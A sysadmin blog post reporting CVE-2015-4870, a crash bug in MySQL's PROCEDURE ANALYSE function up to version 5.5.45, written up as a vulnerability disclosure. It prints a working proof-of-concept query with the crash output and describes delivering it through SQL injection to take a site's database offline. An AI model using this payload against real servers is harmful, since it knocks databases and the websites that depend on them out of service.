Sysadmins of the North
Don't forget to share this post!

MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

Sri Lankan Security researcher Osanda Malith discovered a DoS -or crash- vulnerability in MySQL’s Procedure Analyse Function. The vulnerability crashes MySQL versions up to 5.5.45.

MySQL DoS/crash vulnerability details

Osanda Malith found this crash in the function procedure analyse() while passing a sub query. It’s syntax:

SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);

So an example POC would be:

select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server
 
mysql>

On Windows, this crashes mysql.exe and an administrator needs to restart the MySQL service. In Windows based systems in a single request the process will crash. We have to manually restart the MySQL server. In *nix systems mysqld will automatically recover but still if we keep on sending multiple GET requests with this payload the database will crash.

Taking advantage (exploiting the crash bug)

Osanda Malith writes:

If you came across a website vulnerable to SQL injection you can simply perform a DoS attack so that MySQL server will not respond and the entire database of the website would be down meaning the website will be no longer in an active state.
In Windows based systems in a single request the process will crash. We have to manually restart the MySQL server.

This sounds like a very nasty side-affect of SQL injection vulnerability. In August 2014 I wrote about MySQL sleep() attacks being carried out in the wild. Here an attacker injects sleep(3) into a vulnerable web application, making mysqld sleep for the given amount of time, for every record found -depending on where the sleep() is injected of course. That was a Denial of Service attack on the whole MySQL server, quickly consuming all available connections.

This may interest you:   "WordPress Plugin Social Media Widget Hiding Spam - Remove it now"

This crash/DoS vulnerability however, requires only one request for MySQL on Windows Server, to crash mysql.exe, and a continuous stream of requests for Linux/Unix operating systems because the mysqld service will automatically recover.

Full MySQL Vulnerability details blog post

Read the full details in Osanda Malith’s blog post.

About the Author Jan Reilink

My name is Jan. I am not a hacker, coder, developer, programmer or guru. I am merely a system administrator, doing my daily thing at Vevida in the Netherlands. With over 15 years of experience, my specialties include Windows Server, IIS, Linux (CentOS, Debian), security, PHP, WordPress, websites & optimization. Want to support me and donate? Use this link: https://paypal.me/jreilink.

follow me on:

Leave a Comment:

Skip to content